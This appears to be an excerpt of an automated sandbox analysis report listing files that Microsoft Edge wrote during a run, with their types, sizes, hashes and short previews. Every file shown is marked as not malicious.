                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:of7I4Q+v4YebvqBZFUt8xf7IBG1/+xf7IcQV5LYebvqBaJ:dS4Yebvyg8aaJLYebvL
                                                                                                                                                                                                                                                                                                                                    MD5:3AAB93DFD99548D1A9E0E85496EE6422
                                                                                                                                                                                                                                                                                                                                    SHA1:48F76DEAE0FF61836DBC4A9AD052E894B91F76BC
                                                                                                                                                                                                                                                                                                                                    SHA-256:BC50FCAFCD3E6A54B86BD9296127A64D3243296292679747D93DA597394B919C
                                                                                                                                                                                                                                                                                                                                    SHA-512:D53C928AA2BD2EC09044139A5C5A36926FF929CCC206F52F4673026300A56328258A3FAF2BCE41C1D00F44695E5A3B2B9830D684CFABF9D482AD6A6186E1D308
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:44.854 119c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/31-03:46:44.855 119c Recovering log #3.2024/12/31-03:46:44.858 119c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):328
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.23630365319349
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9eieMM+q2P923oH+TcwtpIFUt8M6f9e6Zmw+M6f9elMVkwO923oH+Tcwta/Wd:ofYpMM+v4YebmFUt8xfY6/+xfYlMV5LT
                                                                                                                                                                                                                                                                                                                                    MD5:184A6706C48A86DBBCCF6B4D04771140
                                                                                                                                                                                                                                                                                                                                    SHA1:B6400A766AFD54D5C5CEFAB4FA1E4DED51BAAE74
                                                                                                                                                                                                                                                                                                                                    SHA-256:291A3AE8774A1AC7E839C88935FFE0C9FEEFDF86DD469AE02C3A9FC569525E13
                                                                                                                                                                                                                                                                                                                                    SHA-512:400CE4B8CBE2EE6A47ACD9BCFFBCAEE2C046A50F6D37B1886EEF3188878370685669C32300E21548F04474DF9FC95C86C328A02BF2E2CD8028A3EEE6CEE5DDE5
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:25.785 106c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/31-03:46:25.786 106c Recovering log #3.2024/12/31-03:46:25.786 106c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):328
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.23630365319349
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9eieMM+q2P923oH+TcwtpIFUt8M6f9e6Zmw+M6f9elMVkwO923oH+Tcwta/Wd:ofYpMM+v4YebmFUt8xfY6/+xfYlMV5LT
                                                                                                                                                                                                                                                                                                                                    MD5:184A6706C48A86DBBCCF6B4D04771140
                                                                                                                                                                                                                                                                                                                                    SHA1:B6400A766AFD54D5C5CEFAB4FA1E4DED51BAAE74
                                                                                                                                                                                                                                                                                                                                    SHA-256:291A3AE8774A1AC7E839C88935FFE0C9FEEFDF86DD469AE02C3A9FC569525E13
                                                                                                                                                                                                                                                                                                                                    SHA-512:400CE4B8CBE2EE6A47ACD9BCFFBCAEE2C046A50F6D37B1886EEF3188878370685669C32300E21548F04474DF9FC95C86C328A02BF2E2CD8028A3EEE6CEE5DDE5
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:25.785 106c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/31-03:46:25.786 106c Recovering log #3.2024/12/31-03:46:25.786 106c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2649904685014508
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:8/2qOB1nxCkMbSAELyKOMq+8yC8F/YfU5m+OlTLVumc:Bq+n0Jb9ELyKOMq+8y9/Owb
                                                                                                                                                                                                                                                                                                                                    MD5:17044C1AD07ECE7095D4C78C00DD0DD6
                                                                                                                                                                                                                                                                                                                                    SHA1:3047F1B9A76AB980BC89B6F392B48721469FC89F
                                                                                                                                                                                                                                                                                                                                    SHA-256:D9868D43378FD125A4C70C558F0B949624859676D196C7E3FC3080F70E2B0292
                                                                                                                                                                                                                                                                                                                                    SHA-512:73A24129A90D3B0CBC68AD39235ECB6BAA4287877FDE514A2C03B69B53DB2AA76B8D4DBCCFCA7398932A1033A8B4ED9FF51A98E18F84D3453C7500E106470E37
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.46659408050501816
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0WsQKPk:v7doKsKuKZKlZNmu46yjx0MKk
                                                                                                                                                                                                                                                                                                                                    MD5:781A8A615AF95424417D025179440E97
                                                                                                                                                                                                                                                                                                                                    SHA1:C30F408207D85CE52E4A86F4F0AF071F57D41DC0
                                                                                                                                                                                                                                                                                                                                    SHA-256:4D73EE17FBC509C5C824723A74B4510D3AA75F894B04C9D343C3C2C62FC515B1
                                                                                                                                                                                                                                                                                                                                    SHA-512:F24B195E94C6161EA4E577BBBF1421B5B4F2929DC1529E76847138FBAE987EBF6B4783B514560BE76571EB4C8D1DB70D9121403DF43058F281B0E46931613D89
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):37149
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.564201977667508
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:hpcE8wqhWPd5f/Y8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPPZAXovFrwQO+MsqKpog:hpxTqhWPd5f/Yu1jaORA4vuQO+4ptu
                                                                                                                                                                                                                                                                                                                                    MD5:E9DBCA0C337342CC9FD4AB0C3EB8566B
                                                                                                                                                                                                                                                                                                                                    SHA1:626721E60425625647B260783E302EF6EB6E20EB
                                                                                                                                                                                                                                                                                                                                    SHA-256:B82726D5188A6FE3E213B828A39567CA44B24901650F6CD63288F12BF4F34FCD
                                                                                                                                                                                                                                                                                                                                    SHA-512:B52F5E0B61AE8C82165B8A9823C05397EDACC6AD5578A6D77F1E6C64A5D34F2B6072FFF670179AEB959F127333A3C6B3EA1F7E46242418F795B52A40A57D2A45
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380108385675880","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380108385675880","location":5,"ma
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):40504
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.5610345169262105
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:hpcE8wi17pLGLhbhWPd5fgY8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPPZAXovFrwQO:hpxTiDchbhWPd5fgYu1jaORA4vuQOJ4Q
                                                                                                                                                                                                                                                                                                                                    MD5:D0F49BBB89CFEB54569885D3343651E1
                                                                                                                                                                                                                                                                                                                                    SHA1:7A5722BEB6821A833D5DDB3D4BE7BBAC3BE0F0C9
                                                                                                                                                                                                                                                                                                                                    SHA-256:7361200B697757D9C3D0E96B5E0F7286CB4D1F43730BDAE23D603CEA4B09DFEC
                                                                                                                                                                                                                                                                                                                                    SHA-512:32B49D89843E733CCC12E42FD29A2FD0600A6007C025E76DA61D8FEAA5F8C811B314FB73BF3C36413FED482E497ADFB52693948ECD9DC3E7750F4798F4F6253C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380108385675880","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380108385675880","location":5,"ma
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):11755
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                                                    MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                                                    SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                                                    SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                                                    SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                                                    MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                                                    SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                                                    SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                                                    SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.10242267976920522
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:+kC43kaRspEjVl/PnnnnnnnnnnnvoQ/Eou:+rQzyoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                                                                    MD5:4689F75AD09385D540E11EC45F50E860
                                                                                                                                                                                                                                                                                                                                    SHA1:A6A50809ED41816EF34443139F1EDEFED18D4C65
                                                                                                                                                                                                                                                                                                                                    SHA-256:F0854344B98FA01BB3E03829ADC855D33884DFAE3A41175D31D9A852DBC9E66B
                                                                                                                                                                                                                                                                                                                                    SHA-512:93A1CC04B40B0157EAC438E8997E803BD51BBA4C95945B4D3F9943118E1E3CE8E0943C3B38900FE8AD90E99DBD9886F50C0DD5841548560C0801E409F2160A9A
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:..-.............M...............4..}...H.k..1...-.............M...............4..}...H.k..1.........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):317272
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8906136441235311
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:G2ffP111FGJW/IkOrapSQlzFsbZUYGlS51OeUm7kz1upbv8GeyOyJTy4yDOyBxyL:uqRPxsiqyi
                                                                                                                                                                                                                                                                                                                                    MD5:321081ACC96FEADBDC79D850892E33D4
                                                                                                                                                                                                                                                                                                                                    SHA1:3D9F8A5AC9FBD3D68F0B96B9CEE681AC2CCDB7D5
                                                                                                                                                                                                                                                                                                                                    SHA-256:49D7F314014688898BB668E2591BAE0C53D75B4EF934C0E29062A8B95C327CE9
                                                                                                                                                                                                                                                                                                                                    SHA-512:7F7D3D198DDD9EECD52E028E320473052A8870CA0322FDC9841B16A648F59048135191DA26943BFDC0727B4AA6F2089974EABF46655F1664DD8B12712C6619AA
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):694
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.552769543416767
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:Wlc8NOuuuuuuuuuuuuuuuuuuuu/lltWlb8f:iDQlt7
                                                                                                                                                                                                                                                                                                                                    MD5:FF4A9D2148015FFE823C8DFA4CB88160
                                                                                                                                                                                                                                                                                                                                    SHA1:E04175C9E7BE0DD6CC7AE304E5B3A2A99631BB1F
                                                                                                                                                                                                                                                                                                                                    SHA-256:DC5B3D02BD049272F8BDD9576C5B3AE3CD1B14057B0B2DDC240E785B420FB7F4
                                                                                                                                                                                                                                                                                                                                    SHA-512:06546546BEFBA4E44498B88582FC40E089153AA1443F3BF9BE2E828CE10D6AB534F0CC5BB5B9E5110B2067D5AD7D8CED42D30958C40FBB5EAEE6FA1345A0B8C9
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............95.f;...............#38_h.......6.Z..W.F......@i......@i..........V.e................V.e................V.e.................2.30................39_config..........6.....n ....1
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.260655798675624
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f900L+q2P923oH+TcwtfrK+IFUt8M6f9HT1Zmw+M6f93LVkwO923oH+TcwtfrF:of6pv4Yeb23FUt8xfV1/+xfH5LYeb3J
                                                                                                                                                                                                                                                                                                                                    MD5:71FB103FB182AAE1CF5DA840556956AE
                                                                                                                                                                                                                                                                                                                                    SHA1:8E75DDCBB4453A7432C33F9E70AD633D63FCA77D
                                                                                                                                                                                                                                                                                                                                    SHA-256:DEB35AB68C02DFEB89A232DDBFFD8B758233500D4BCA318C713CCD3DDF0A5925
                                                                                                                                                                                                                                                                                                                                    SHA-512:05C2294FD6CC8C04294D267E50D5476D79BB3E6D6F65AB4E67FFDBBAB901E85024B1D6340A33F56F00EE9F38453ABB185FB39B000F0171B2D661E68929C70F77
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:26.367 9a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/31-03:46:26.415 9a8 Recovering log #3.2024/12/31-03:46:26.417 9a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.260655798675624
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f900L+q2P923oH+TcwtfrK+IFUt8M6f9HT1Zmw+M6f93LVkwO923oH+TcwtfrF:of6pv4Yeb23FUt8xfV1/+xfH5LYeb3J
                                                                                                                                                                                                                                                                                                                                    MD5:71FB103FB182AAE1CF5DA840556956AE
                                                                                                                                                                                                                                                                                                                                    SHA1:8E75DDCBB4453A7432C33F9E70AD633D63FCA77D
                                                                                                                                                                                                                                                                                                                                    SHA-256:DEB35AB68C02DFEB89A232DDBFFD8B758233500D4BCA318C713CCD3DDF0A5925
                                                                                                                                                                                                                                                                                                                                    SHA-512:05C2294FD6CC8C04294D267E50D5476D79BB3E6D6F65AB4E67FFDBBAB901E85024B1D6340A33F56F00EE9F38453ABB185FB39B000F0171B2D661E68929C70F77
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:26.367 9a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/31-03:46:26.415 9a8 Recovering log #3.2024/12/31-03:46:26.417 9a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):787
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                                                                    MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                                                                    SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                                                                    SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                                                                    SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):339
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.199507421495715
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f90TlL+q2P923oH+TcwtfrzAdIFUt8M6f90uj1Zmw+M6f90u1LVkwO923oH+TC:of68v4Yeb9FUt8xf6+1/+xf6w5LYeb2J
                                                                                                                                                                                                                                                                                                                                    MD5:5616484730608609232AFF57DD4233EA
                                                                                                                                                                                                                                                                                                                                    SHA1:FBD88FE9FE3431C106171233B1B6F96CBA7D7522
                                                                                                                                                                                                                                                                                                                                    SHA-256:14798BEAB1C04C28DDF054C3890522CBCC8B14009FAEFEEFAADF47FD59EC8CC1
                                                                                                                                                                                                                                                                                                                                    SHA-512:EEF2CD2798B870A2539CEA9F6144018AAFC2E7A170CF79DF3FF08C87D338232414492FD8AAA8D16D95764012CB9FAD5F52D2846A70D46483A365C071EDD5A2AC
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:26.362 9a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/31-03:46:26.363 9a8 Recovering log #3.2024/12/31-03:46:26.363 9a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):339
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.199507421495715
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
